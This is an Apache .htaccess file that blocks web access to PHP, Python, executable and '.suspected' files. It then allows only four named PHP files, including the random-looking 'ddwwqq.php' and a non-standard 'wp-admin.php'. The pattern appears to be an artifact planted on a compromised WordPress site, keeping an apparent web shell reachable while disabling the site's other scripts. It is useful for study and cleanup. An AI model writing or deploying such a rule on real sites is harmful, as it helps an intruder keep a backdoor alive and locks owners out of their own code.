<FilesMatch ".(py|exe|phtml|php|PHP|Php|PHp|pHp|pHP|phP|PhP|php5|PHP7|suspected)$">
Order Allow,Deny
Deny from all
</FilesMatch>
<FilesMatch "^(ddwwqq.php|wp-admin.php|wp-load.php|index.php)$">
Order Allow,Deny
Allow from all
</FilesMatch>
